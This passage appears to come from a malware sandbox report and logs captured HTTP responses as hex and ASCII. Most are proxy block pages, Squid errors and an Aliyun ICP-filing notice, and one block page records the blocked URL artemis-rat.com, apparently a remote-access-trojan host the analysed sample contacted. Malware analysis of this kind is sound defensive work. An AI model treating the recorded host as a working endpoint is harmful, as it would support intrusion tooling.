79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:00 GMTContent-Type: text/html;charset=utf-8Content-Length: 3833X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13596Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 61 6c 65 72 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:00 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 54
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:00 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 12 Mar 2024 07:37:00 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Tue, 12 Mar 2024 07:37:01 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/htmlCache-Control: no-cacheX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Length: 4872Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 